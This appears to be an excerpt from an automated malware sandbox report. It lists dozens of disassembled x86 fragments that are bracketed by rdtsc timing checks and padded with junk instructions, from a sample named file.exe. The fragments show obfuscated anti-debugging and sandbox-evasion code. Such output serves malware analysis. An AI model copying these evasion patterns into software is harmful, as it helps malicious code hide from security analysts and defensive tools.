Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1522 second address: 7C15DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, 1D64C47Eh 0x0000000f xor dword ptr [ebp+122D1856h], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FAA34DB19B8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov edx, dword ptr [ebp+122D38EFh] 0x00000037 movsx edi, di 0x0000003a mov cl, 33h 0x0000003c push 08AC9DFBh 0x00000041 jmp 00007FAA34DB19BDh 0x00000046 xor dword ptr [esp], 08AC9D7Bh 0x0000004d mov dword ptr [ebp+122D18BEh], ecx 0x00000053 push 00000003h 0x00000055 mov edi, dword ptr [ebp+122D1C23h] 0x0000005b mov ecx, dword ptr [ebp+122D1F3Ah] 0x00000061 push 00000000h 0x00000063 push 00000000h 0x00000065 push ecx 0x00000066 call 00007FAA34DB19B8h 0x0000006b pop ecx 0x0000006c mov dword ptr [esp+04h], ecx 0x00000070 add dword ptr [esp+04h], 00000018h 0x00000078 inc ecx 0x00000079 push ecx 0x0000007a ret 0x0000007b pop ecx 0x0000007c ret 0x0000007d mov ecx, dword ptr [ebp+122D3847h] 0x00000083 push 00000003h 0x00000085 movsx edx, bx 0x00000088 call 00007FAA34DB19B9h 0x0000008d push edi 0x0000008e jc 00007FAA34DB19BCh 0x00000094 push eax 0x00000095 push edx 0x00000096 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DFE9F second address: 7DFEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAA34ECFF5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DFEB0 second address: 7DFEB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DFEB9 second address: 7DFED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAA34ECFF56h 0x0000000a jns 00007FAA34ECFF56h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0196 second address: 7E019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E05C8 second address: 7E0610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAA34ECFF5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAA34ECFF68h 0x00000010 jmp 00007FAA34ECFF5Fh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0610 second address: 7E0628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0628 second address: 7E0636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAA34ECFF56h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E07B0 second address: 7E07C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007FAA34DB19B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E07C0 second address: 7E07CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAA34ECFF56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E07CA second address: 7E07CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0E6A second address: 7E0E70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0E70 second address: 7E0E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0E79 second address: 7E0EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAA34ECFF61h 0x0000000c jmp 00007FAA34ECFF69h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1CFA second address: 7E1D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1D00 second address: 7E1D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4CF5 second address: 7E4D0F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAA34DB19B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FAA34DB19B6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jg 00007FAA34DB19B6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4D0F second address: 7E4D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF60h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4D24 second address: 7E4D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79F48E second address: 79F49E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAA34ECFF5Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79F49E second address: 79F4E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FAA34DB19B6h 0x0000000b jmp 00007FAA34DB19C0h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 js 00007FAA34DB19B6h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push edi 0x00000020 pushad 0x00000021 jmp 00007FAA34DB19BBh 0x00000026 jmp 00007FAA34DB19C2h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87EE second address: 7B87F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87F4 second address: 7B87F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87F8 second address: 7B87FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F082F second address: 7F0838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0B30 second address: 7F0B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1191 second address: 7F1196 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F32F7 second address: 7F32FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F339C second address: 7F33A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F33A0 second address: 7F33AE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAA34ECFF56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F3589 second address: 7F358E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F358E second address: 7F359E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F359E second address: 7F35A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F35A2 second address: 7F35AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAA34ECFF56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F40DF second address: 7F40E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F40E3 second address: 7F40E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F40E9 second address: 7F40EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F40EF second address: 7F40F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4196 second address: 7F41AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FAA34DB19B6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F41AB second address: 7F41B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 je 00007FAA34ECFF56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F51DC second address: 7F51E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F593C second address: 7F594B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAA34ECFF5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6CDE second address: 7F6CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6CE2 second address: 7F6CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FAA34ECFF56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6CF0 second address: 7F6CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6CF4 second address: 7F6D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6D00 second address: 7F6D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6D06 second address: 7F6D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F7846 second address: 7F785A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19BFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F785A second address: 7F7860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F95DE second address: 7F95E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F95E4 second address: 7F95F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA15A second address: 7FA175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD53E second address: 7FD542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC72A second address: 7FC72F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA175 second address: 7FA17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD542 second address: 7FD57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D183Eh] 0x00000010 push 00000000h 0x00000012 adc edi, 39498F79h 0x00000018 push 00000000h 0x0000001a jmp 00007FAA34DB19BEh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FAA34DB19BEh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA17B second address: 7FA180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD57E second address: 7FD583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE4E4 second address: 7FE4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD6F1 second address: 7FD6F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE4E8 second address: 7FE4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD6F5 second address: 7FD6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE68D second address: 7FE692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE692 second address: 7FE698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B5367 second address: 7B536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF746 second address: 7FF750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FAA34DB19B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B536B second address: 7B5371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80204E second address: 802052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802052 second address: 802058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802058 second address: 80205E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803E7B second address: 803E85 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAA34ECFF56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803E85 second address: 803F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAA34DB19C9h 0x00000008 jmp 00007FAA34DB19C4h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 sbb bx, 4ED2h 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+12454DDDh] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FAA34DB19B8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c xchg eax, esi 0x0000003d jmp 00007FAA34DB19C8h 0x00000042 push eax 0x00000043 jbe 00007FAA34DB19BEh 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EEC second address: 804EF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EF6 second address: 804EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806E26 second address: 806E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806E2A second address: 806E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EFA second address: 804F63 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D3198h], ecx 0x0000000e xor ebx, dword ptr [ebp+122D387Bh] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, ecx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FAA34ECFF58h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov eax, dword ptr [ebp+122D04D9h] 0x00000044 mov edi, dword ptr [ebp+122D1F59h] 0x0000004a push FFFFFFFFh 0x0000004c mov dword ptr [ebp+122D2A73h], edi 0x00000052 nop 0x00000053 js 00007FAA34ECFF7Ah 0x00000059 push eax 0x0000005a push edx 0x0000005b jg 00007FAA34ECFF56h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804F63 second address: 804F89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FAA34DB19B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804F89 second address: 804F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804F8D second address: 804F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 807D4D second address: 807DED instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAA34ECFF5Ch 0x00000008 jne 00007FAA34ECFF56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 adc bx, 6400h 0x00000018 mov edi, dword ptr [ebp+122D3AA3h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FAA34ECFF58h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a and edi, 7673A36Fh 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FAA34ECFF58h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c jmp 00007FAA34ECFF5Eh 0x00000061 push esi 0x00000062 mov edi, dword ptr [ebp+122D3873h] 0x00000068 pop ebx 0x00000069 push eax 0x0000006a pushad 0x0000006b pushad 0x0000006c push eax 0x0000006d pop eax 0x0000006e jmp 00007FAA34ECFF63h 0x00000073 popad 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C88 second address: 808CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FAA34DB19B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808ECF second address: 808ED4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BDAB second address: 80BDAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BDAF second address: 80BDBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BDBD second address: 80BE37 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAA34DB19B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FAA34DB19B8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FAA34DB19B8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 jnl 00007FAA34DB19BAh 0x00000047 push 00000000h 0x00000049 jmp 00007FAA34DB19C9h 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jp 00007FAA34DB19BCh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
